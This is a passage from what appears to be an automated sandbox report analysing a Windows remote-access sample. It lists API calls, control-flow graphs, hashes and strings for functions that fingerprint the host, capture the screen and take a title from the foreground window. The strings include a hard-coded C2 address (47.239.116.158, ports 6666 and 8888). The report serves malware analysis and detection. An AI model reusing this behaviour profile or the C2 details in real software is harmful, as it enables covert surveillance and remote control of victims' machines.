                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                              • String ID: invalid string position
                                                                                                              • API String ID: 1961742612-1799206989
                                                                                                              • Opcode ID: a8e25bbc6a21eedc27d10b22e655f90072170f6f950a00dda608b9d11941bb9f
                                                                                                              • Instruction ID: 67fb18237032cc064eebd7249d25bd9b4846e2662191759c125cf3f56e65ba83
                                                                                                              • Opcode Fuzzy Hash: a8e25bbc6a21eedc27d10b22e655f90072170f6f950a00dda608b9d11941bb9f
                                                                                                              • Instruction Fuzzy Hash: 7ED017B2960268ABCF08E7E0DC82ADD7378AF14711F440834E201B6492DFB4A608D761
                                                                                                              Function 6E0AD27E Relevance: 5.1, APIs: 4, Instructions: 139COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,?,?), ref: 6E0AD314
                                                                                                              • GetLastError.KERNEL32 ref: 6E0AD322
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 6E0AD37D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 1717984340-0
                                                                                                              • Opcode ID: 61c8805c3120fdea034c5ee5237a0cc5dbc0a8cad38e8810dc12341769bae6a4
                                                                                                              • Instruction ID: 00d3cd85e1d082d230df961fc3694c8227b1bcc784d37afe79c03db486db5e77
                                                                                                              • Opcode Fuzzy Hash: 61c8805c3120fdea034c5ee5237a0cc5dbc0a8cad38e8810dc12341769bae6a4
                                                                                                              • Instruction Fuzzy Hash: 0741FB3260420AAFDB118FEDC8547AE7BF5EF12358F114559EEA8AB196D7718801CF50
                                                                                                              Function 00C2483E Relevance: 5.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetProcessHeap.KERNEL32(00000000,0000000D,?,00C2133E), ref: 00C247BF
                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00C2133E), ref: 00C247C6
                                                                                                                • Part of subcall function 00C246D7: IsProcessorFeaturePresent.KERNEL32(0000000C,00C247AD,?,00C2133E), ref: 00C246D9
                                                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00C2133E), ref: 00C247E8
                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00C2133E), ref: 00C24815
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocHeapVirtual$FeatureFreePresentProcessProcessor
                                                                                                              • String ID:
                                                                                                              • API String ID: 4058086966-0
                                                                                                              • Opcode ID: f62c64a8d7142726d602158258529398ccb734feebaf50720b334a6159882190
                                                                                                              • Instruction ID: 592746fb457c2eb2b274ef972520c2a937b0ed59d0cefca0f21aafe4ca6860ec
                                                                                                              • Opcode Fuzzy Hash: f62c64a8d7142726d602158258529398ccb734feebaf50720b334a6159882190
                                                                                                              • Instruction Fuzzy Hash: 1B01D431760271E7EB255BB9BC08FAE36A9EB85B42F260024F921D69D0CBB0CD41C660

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:5.2%
                                                                                                              Dynamic/Decrypted Code Coverage:11.1%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:9
                                                                                                              Total number of Limit Nodes:1
                                                                                                              execution_graph 47537 170000 GetPEB 47538 17002f 47537->47538 47539 170156 LoadLibraryA 47538->47539 47541 170163 VirtualAlloc 47538->47541 47546 17022a 47539->47546 47542 17018f VirtualAlloc 47541->47542 47542->47539 47544 1702f1 47545 17033a 888 API calls 47545->47546 47546->47544 47546->47545 47547 25832d0 6 API calls

                                                                                                              Executed Functions

                                                                                                              Function 04DF5430 Relevance: 98.5, APIs: 42, Strings: 14, Instructions: 467stringnetworklibraryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 4df5430-4df54b7 call 4dff757 call 4e067c0 * 3 gethostname gethostbyname 9 4df54bd-4df5504 inet_ntoa call 4e0041d * 2 0->9 10 4df555c-4df569d MultiByteToWideChar * 2 GetLastInputInfo GetTickCount wsprintfW MultiByteToWideChar * 2 call 4df74e0 GetSystemInfo wsprintfW call 4df6ca0 call 4df6f30 GetForegroundWindow 0->10 9->10 20 4df5506-4df5508 9->20 23 4df569f-4df56ac GetWindowTextW 10->23 24 4df56b2-4df56c0 10->24 22 4df5510-4df555a inet_ntoa call 4e0041d * 2 20->22 22->10 23->24 26 4df56cc-4df56f0 lstrlenW call 4df6dc0 24->26 27 4df56c2 24->27 33 4df5702-4df5726 call 4dff8c6 26->33 34 4df56f2-4df56ff call 4dff8c6 26->34 27->26 39 4df5728 33->39 40 4df5732-4df5756 lstrlenW call 4df6dc0 33->40 34->33 39->40 43 4df5768-4df57b9 GetModuleHandleW GetProcAddress 40->43 44 4df5758-4df5765 call 4dff8c6 40->44 46 4df57bb-4df57c4 GetNativeSystemInfo 43->46 47 4df57c6-4df57cd GetSystemInfo 43->47 44->43 49 4df57d3-4df57e1 46->49 47->49 50 4df57ed-4df57f2 49->50 51 4df57e3-4df57eb 49->51 53 4df57f9-4df5820 wsprintfW call 4df6ac0 GetCurrentProcessId 50->53 51->50 52 4df57f4 51->52 52->53 56 4df5885-4df588c call 4df66e0 53->56 57 4df5822-4df583c OpenProcess 53->57 65 4df589e-4df58ab 56->65 66 4df588e-4df589c 56->66 57->56 58 4df583e-4df5853 K32GetProcessImageFileNameW 57->58 60 4df585e-4df5866 call 4df8140 58->60 61 4df5855-4df585c 58->61 67 4df586b-4df586d 60->67 63 4df587f CloseHandle 61->63 63->56 68 4df58ac-4df59e9 call 4dff8c6 call 4df64e0 call 4df61a0 call 4dffc5e GetTickCount call 4e0048a call 4e003f6 wsprintfW * 3 GetLocaleInfoW GetSystemDirectoryW GetCurrentHwProfileW 65->68 66->68 69 4df586f-4df5876 67->69 70 4df5878-4df587e 67->70 83 4df59eb-4df5a10 68->83 84 4df5a12-4df5a31 68->84 69->63 70->63 85 4df5a32-4df5a57 call 4df5a80 call 4df3160 83->85 84->85 88 4df5a59-4df5a76 call 4dff04f call 4dff05a 85->88
                                                                                                              APIs
                                                                                                                • Part of subcall function 04DFF757: _malloc.LIBCMT ref: 04DFF771
                                                                                                              • _memset.LIBCMT ref: 04DF546C
                                                                                                              • _memset.LIBCMT ref: 04DF5485
                                                                                                              • _memset.LIBCMT ref: 04DF5495
                                                                                                              • gethostname.WS2_32(?,00000032), ref: 04DF54A3
                                                                                                              • gethostbyname.WS2_32(?), ref: 04DF54AD
                                                                                                              • inet_ntoa.WS2_32 ref: 04DF54C5
                                                                                                              • _strcat_s.LIBCMT ref: 04DF54D8
                                                                                                              • _strcat_s.LIBCMT ref: 04DF54F1
                                                                                                              • inet_ntoa.WS2_32 ref: 04DF551A
                                                                                                              • _strcat_s.LIBCMT ref: 04DF552D
                                                                                                              • _strcat_s.LIBCMT ref: 04DF5546
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04DF5573
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04DF5587
                                                                                                              • GetLastInputInfo.USER32(?), ref: 04DF559A
                                                                                                              • GetTickCount.KERNEL32 ref: 04DF55A0
                                                                                                              • wsprintfW.USER32 ref: 04DF55D5
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 04DF55E8
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 04DF55FC
                                                                                                              • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04DF5653
                                                                                                              • wsprintfW.USER32 ref: 04DF566C
                                                                                                              • GetForegroundWindow.USER32 ref: 04DF5695
                                                                                                              • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 04DF56AC
                                                                                                              • lstrlenW.KERNEL32(000008CC), ref: 04DF56D3
                                                                                                              • lstrlenW.KERNEL32(00000994), ref: 04DF5739
                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 04DF57AA
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04DF57B1
                                                                                                              • GetNativeSystemInfo.KERNELBASE(?), ref: 04DF57C2
                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 04DF57CD
                                                                                                              • wsprintfW.USER32 ref: 04DF5806
                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 04DF5818
                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 04DF582E
                                                                                                              • K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 04DF584B
                                                                                                              • CloseHandle.KERNEL32(04E16164), ref: 04DF587F
                                                                                                              • GetTickCount.KERNEL32 ref: 04DF58E9
                                                                                                              • __time64.LIBCMT ref: 04DF58F8
                                                                                                              • __localtime64.LIBCMT ref: 04DF592F
                                                                                                              • wsprintfW.USER32 ref: 04DF5969
                                                                                                              • wsprintfW.USER32 ref: 04DF5981
                                                                                                                • Part of subcall function 04DF8140: GetLogicalDriveStringsW.KERNELBASE(000003E8,?,75A773E0,00000B9C,00000000), ref: 04DF8182
                                                                                                                • Part of subcall function 04DF8140: lstrcmpiW.KERNEL32(?,A:\), ref: 04DF81B6
                                                                                                                • Part of subcall function 04DF8140: lstrcmpiW.KERNEL32(?,B:\), ref: 04DF81C6
                                                                                                                • Part of subcall function 04DF8140: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 04DF81F6
                                                                                                                • Part of subcall function 04DF8140: lstrlenW.KERNEL32(?), ref: 04DF8207
                                                                                                                • Part of subcall function 04DF8140: __wcsnicmp.LIBCMT ref: 04DF821E
                                                                                                                • Part of subcall function 04DF8140: lstrcpyW.KERNEL32(00000B9C,?), ref: 04DF8254
                                                                                                              • wsprintfW.USER32 ref: 04DF59B0
                                                                                                              • GetLocaleInfoW.KERNELBASE(00000800,00000002,0000100E,00000040), ref: 04DF59C5
                                                                                                              • GetSystemDirectoryW.KERNEL32(0000124C,00000032), ref: 04DF59D4
                                                                                                              • GetCurrentHwProfileW.ADVAPI32(?), ref: 04DF59E1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: wsprintf$Info$ByteCharMultiSystemWide_strcat_s$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
                                                                                                              • String ID: %d min$%d.%d.%d %d:%d:%d$1.0$2024. 9.23$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
                                                                                                              • API String ID: 2154145408-4261108655
                                                                                                              • Opcode ID: 6b79268b05b80b2cc7818e3cbae9eb511a1113cc7530efde2d6f708091108f45
                                                                                                              • Instruction ID: 4c9f26012a53c2c5df428f897b8f5e98ccdc149ffea6efa08b8005cd6fa19f61
                                                                                                              • Opcode Fuzzy Hash: 6b79268b05b80b2cc7818e3cbae9eb511a1113cc7530efde2d6f708091108f45
                                                                                                              • Instruction Fuzzy Hash: 4F02B4B1A40204ABE724DF64DC81FEAB7B8EF44704F008659E71EA7181EB74BA45CF65
                                                                                                              Function 04DFDF60 Relevance: 59.9, APIs: 24, Strings: 10, Instructions: 354sleepregistrysynchronizationCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 94 4dfdf60-4dfdfc2 call 4e00590 Sleep 97 4dfdfe7-4dfdfed 94->97 98 4dfdfc4-4dfdfe1 call 4dff757 call 4dffa79 CloseHandle 94->98 100 4dfdfef call 4df7670 97->100 101 4dfdff4-4dfe069 GetLocalTime wsprintfW SetUnhandledExceptionFilter call 4dffa79 CloseHandle call 4dff757 97->101 98->97 100->101 110 4dfe06b-4dfe076 call 4df2c90 101->110 111 4dfe078 101->111 113 4dfe07c-4dfe096 call 4dff757 110->113 111->113 117 4dfe098-4dfe099 call 4df9780 113->117 118 4dfe0a4 113->118 121 4dfe09e-4dfe0a2 117->121 120 4dfe0a8 118->120 122 4dfe0b3-4dfe0bf call 4dfce50 120->122 121->120 125 4dfe109-4dfe14a call 4dff8c6 * 2 122->125 126 4dfe0c1-4dfe107 call 4dff8c6 * 2 122->126 135 4dfe150-4dfe160 125->135 126->135 136 4dfe1a2-4dfe1aa 135->136 137 4dfe162-4dfe19c call 4dfce50 call 4dff8c6 * 2 135->137 138 4dfe1ac-4dfe1ae 136->138 139 4dfe1b2-4dfe1b9 136->139 137->136 138->139 141 4dfe1bb-4dfe1c5 139->141 142 4dfe1c7-4dfe1cb 139->142 144 4dfe1d1-4dfe1d7 141->144 142->144 146 4dfe1d9-4dfe1f3 EnumWindows 144->146 147 4dfe216-4dfe23e call 4e00590 call 4df2da0 144->147 146->147 149 4dfe1f5-4dfe214 Sleep EnumWindows 146->149 155 4dfe250-4dfe2fc call 4e00590 CreateEventA call 4dff8c6 call 4dfcac0 147->155 156 4dfe240-4dfe24b Sleep 147->156 149->147 149->149 164 4dfe307-4dfe30d 155->164 156->122 165 4dfe30f-4dfe343 Sleep RegOpenKeyExW 164->165 166 4dfe368-4dfe37c call 4df5430 164->166 167 4dfe345-4dfe35b RegQueryValueExW 165->167 168 4dfe361-4dfe366 165->168 170 4dfe381-4dfe387 166->170 167->168 168->164 168->166 171 4dfe3ba-4dfe3c0 170->171 172 4dfe389-4dfe3b5 CloseHandle 170->172 173 4dfe3c2-4dfe3de call 4dffa79 171->173 174 4dfe3e0 171->174 172->122 177 4dfe3e4 173->177 174->177 179 4dfe3e6-4dfe3ed 177->179 180 4dfe3ef-4dfe3fe Sleep 179->180 181 4dfe45d-4dfe470 179->181 180->179 182 4dfe400-4dfe407 180->182 185 4dfe482-4dfe4bc call 4e00590 Sleep CloseHandle 181->185 186 4dfe472-4dfe47c WaitForSingleObject CloseHandle 181->186 182->181 184 4dfe409-4dfe41b 182->184 190 4dfe42d-4dfe458 Sleep CloseHandle 184->190 191 4dfe41d-4dfe427 WaitForSingleObject CloseHandle 184->191 185->122 186->185 190->122 191->190
                                                                                                              APIs
                                                                                                                • Part of subcall function 04E00590: __fassign.LIBCMT ref: 04E00586
                                                                                                              • Sleep.KERNELBASE(00000000), ref: 04DFDFB4
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 04DFDFE1
                                                                                                              • GetLocalTime.KERNEL32(?), ref: 04DFDFF9
                                                                                                              • wsprintfW.USER32 ref: 04DFE030
                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(04DF7600), ref: 04DFE03E
                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 04DFE057
                                                                                                                • Part of subcall function 04DFF757: _malloc.LIBCMT ref: 04DFF771
                                                                                                              • EnumWindows.USER32(04DF5D10,?), ref: 04DFE1ED
                                                                                                              • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04DFE1FA
                                                                                                              • EnumWindows.USER32(04DF5D10,?), ref: 04DFE20E
                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 04DFE245
                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 04DFE291
                                                                                                              • Sleep.KERNELBASE(00000FA0), ref: 04DFE314
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 04DFE33B
                                                                                                              • RegQueryValueExW.KERNELBASE(?,IpDatespecial,00000000,?,00000000,?), ref: 04DFE35B
                                                                                                              • CloseHandle.KERNEL32(?), ref: 04DFE3AD
                                                                                                              • Sleep.KERNEL32(000003E8,?,?), ref: 04DFE3F4
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 04DFE420
                                                                                                              • CloseHandle.KERNEL32(?,?,?), ref: 04DFE427
                                                                                                              • Sleep.KERNEL32(000003E8,?,?), ref: 04DFE432
                                                                                                              • CloseHandle.KERNEL32(?), ref: 04DFE450
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 04DFE475
                                                                                                              • CloseHandle.KERNEL32(?,?,?), ref: 04DFE47C
                                                                                                              • Sleep.KERNEL32(00000000,?,?,?), ref: 04DFE496
                                                                                                              • CloseHandle.KERNEL32(?), ref: 04DFE4B4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                                                                                              • String ID: %4d.%2d.%2d-%2d:%2d:%2d$127.0.0.1$47.239.116.158$47.239.116.158$47.239.116.158$6666$6666$8888$Console$IpDatespecial
                                                                                                              • API String ID: 1511462596-3870480628
                                                                                                              • Opcode ID: 25bf09fec3e0205da2507ad5026ca02c762b31200c9a8ed2dd4d4c452721aa24
                                                                                                              • Instruction ID: a7253b6c908472b74c38265fb3790f0413c5042cdd5df681cbc6b12c5516b137
                                                                                                              • Opcode Fuzzy Hash: 25bf09fec3e0205da2507ad5026ca02c762b31200c9a8ed2dd4d4c452721aa24
                                                                                                              • Instruction Fuzzy Hash: 7AD125B1684340AFE330DF65DD84E2AB7E4FBC4706F050A1DFA55832A0DB75A904CB62
                                                                                                              Function 04DFBCC0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 351windowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 193 4dfbcc0-4dfbd33 GetDesktopWindow GetDC CreateCompatibleDC GetDC GetDeviceCaps * 2 ReleaseDC 194 4dfbd46-4dfbd4e GetSystemMetrics 193->194 195 4dfbd35-4dfbd41 193->195 197 4dfbd9b-4dfbdb9 call 4e11220 GetSystemMetrics call 4e11220 194->197 198 4dfbd50-4dfbd99 call 4e11220 GetSystemMetrics call 4e11220 194->198 196 4dfbdc6-4dfbf4f GetSystemMetrics call 4e11220 GetSystemMetrics call 4e11220 CreateCompatibleBitmap SelectObject SetStretchBltMode GetSystemMetrics call 4e11220 GetSystemMetrics call 4e11220 StretchBlt call 4dff044 call 4e067c0 GetDIBits call 4dff044 call 4e067c0 call 4e076b0 call 4dff757 195->196 227 4dfbf51-4dfbf5e 196->227 228 4dfbf60-4dfbf66 call 4dfc0b0 196->228 209 4dfbdbe-4dfbdc3 197->209 198->209 209->196 227->228 230 4dfbf6b-4dfbf6d 228->230 231 4dfbf6f-4dfbf9a DeleteObject * 2 ReleaseDC call 4dffb19 230->231 232 4dfbfe9-4dfc013 call 4dff044 230->232 237 4dfbf9c-4dfbfa2 call 4dffb19 231->237 238 4dfbfa5-4dfbfa7 231->238 239 4dfc019 232->239 240 4dfc015-4dfc017 232->240 237->238 243 4dfbfa9-4dfbfad 238->243 244 4dfbfd4-4dfbfe6 call 4dff05a 238->244 242 4dfc01b-4dfc056 call 4e076b0 DeleteObject * 2 ReleaseDC call 4dffb19 239->242 240->242 258 4dfc058-4dfc05e call 4dffb19 242->258 259 4dfc061-4dfc065 242->259 248 4dfbfaf-4dfbfb7 call 4dff04f 243->248 249 4dfbfba-4dfbfd1 call 4dff04f 243->249 248->249 249->244 258->259 260 4dfc067-4dfc06f call 4dff04f 259->260 261 4dfc072-4dfc09f call 4dff04f call 4dff05a 259->261 260->261
                                                                                                              APIs
                                                                                                              • GetDesktopWindow.USER32 ref: 04DFBCDF
                                                                                                              • GetDC.USER32(00000000), ref: 04DFBCEC
                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 04DFBCF2
                                                                                                              • GetDC.USER32(00000000), ref: 04DFBCFD
                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 04DFBD0A
                                                                                                              • GetDeviceCaps.GDI32(00000000,00000076), ref: 04DFBD12
                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 04DFBD23
                                                                                                              • GetSystemMetrics.USER32(0000004E), ref: 04DFBD48
                                                                                                              • GetSystemMetrics.USER32(0000004F), ref: 04DFBD76
                                                                                                              • GetSystemMetrics.USER32(0000004C), ref: 04DFBDC8
                                                                                                              • GetSystemMetrics.USER32(0000004D), ref: 04DFBDDD
                                                                                                              • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 04DFBDF6
                                                                                                              • SelectObject.GDI32(?,00000000), ref: 04DFBE04
                                                                                                              • SetStretchBltMode.GDI32(?,00000003), ref: 04DFBE10
                                                                                                              • GetSystemMetrics.USER32(0000004F), ref: 04DFBE1D
                                                                                                              • GetSystemMetrics.USER32(0000004E), ref: 04DFBE30
                                                                                                              • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 04DFBE57
                                                                                                              • _memset.LIBCMT ref: 04DFBECA
                                                                                                              • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 04DFBEE7
                                                                                                              • _memset.LIBCMT ref: 04DFBEFF
                                                                                                                • Part of subcall function 04DFF757: _malloc.LIBCMT ref: 04DFF771
                                                                                                              • DeleteObject.GDI32(?), ref: 04DFBF73
                                                                                                              • DeleteObject.GDI32(?), ref: 04DFBF7D
                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 04DFBF89
                                                                                                              • DeleteObject.GDI32(?), ref: 04DFC02F
                                                                                                              • DeleteObject.GDI32(?), ref: 04DFC039
                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 04DFC045
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                                                                                              • String ID: ($6$gfff$gfff
                                                                                                              • API String ID: 3293817703-713438465
                                                                                                              • Opcode ID: 05d8cabd0bbdaf5b561e41980b04b71d5c8679f2764cefdb7f423ee3f5ac643d
                                                                                                              • Instruction ID: 344ed3b7084ca98d438ab9fb604fffc069923ca0dfa02087764118fe6df8f348
                                                                                                              • Opcode Fuzzy Hash: 05d8cabd0bbdaf5b561e41980b04b71d5c8679f2764cefdb7f423ee3f5ac643d
                                                                                                              • Instruction Fuzzy Hash: 4FD171B1E00308AFEB14DFE5EC85B9EBBB9FF48300F154529EA05A7250D774A945CB61
                                                                                                              Function 04DF6CA0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 99COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDriveTypeW.KERNELBASE(?,7591DF80,00000000,75A773E0), ref: 04DF6CDB
                                                                                                              • GetDiskFreeSpaceExW.KERNELBASE(?,?,?,?), ref: 04DF6CFA
                                                                                                              • _memset.LIBCMT ref: 04DF6D31
                                                                                                              • GlobalMemoryStatusEx.KERNELBASE(?), ref: 04DF6D44
                                                                                                              • swprintf.LIBCMT ref: 04DF6D89
                                                                                                              • swprintf.LIBCMT ref: 04DF6D9C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                                                                                              • String ID: %sFree%d Gb $:$@$HDD:%d
                                                                                                              • API String ID: 3202570353-3501811827
                                                                                                              • Opcode ID: 8851af1f95f01beb8cf13b3f1d1075b4b8bf1a116779a84fc9374c7c50f4b4d5
                                                                                                              • Instruction ID: 0ee35d192943dd0baf4c85cc9457379e3204de6bf27635143feaadb1131256d8
                                                                                                              • Opcode Fuzzy Hash: 8851af1f95f01beb8cf13b3f1d1075b4b8bf1a116779a84fc9374c7c50f4b4d5
                                                                                                              • Instruction Fuzzy Hash: 48315EB2E4020C9BDB14CFE5DC45FEEB7B9FB88700F50421DE91AA7240E6746905CBA0
                                                                                                              Function 04DF6F30 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 410COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateDXGIFactory.DXGI(04E167CC,?,E179827C,7591DF80,00000000,75A773E0), ref: 04DF6F9A
                                                                                                              • swprintf.LIBCMT ref: 04DF716E
                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 04DF7217
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                                                                                                              • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                                                                                                              • API String ID: 3803070356-257307503
                                                                                                              • Opcode ID: 37df94d1e9c12edbf74021f903af3f776e9d6c21a012fa39016a52f3bb4763b3
                                                                                                              • Instruction ID: 3834060b8968794ba67494cd25855557f8c72e671a367daa24351cc8543c51e6
                                                                                                              • Opcode Fuzzy Hash: 37df94d1e9c12edbf74021f903af3f776e9d6c21a012fa39016a52f3bb4763b3
                                                                                                              • Instruction Fuzzy Hash: 12E16371B001259FDF34DE64CC80BEEB3B5FF89304F1545A9EA4AA7284D771AE818B91
                                                                                                              Function 00170000 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 224memorylibraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00170178
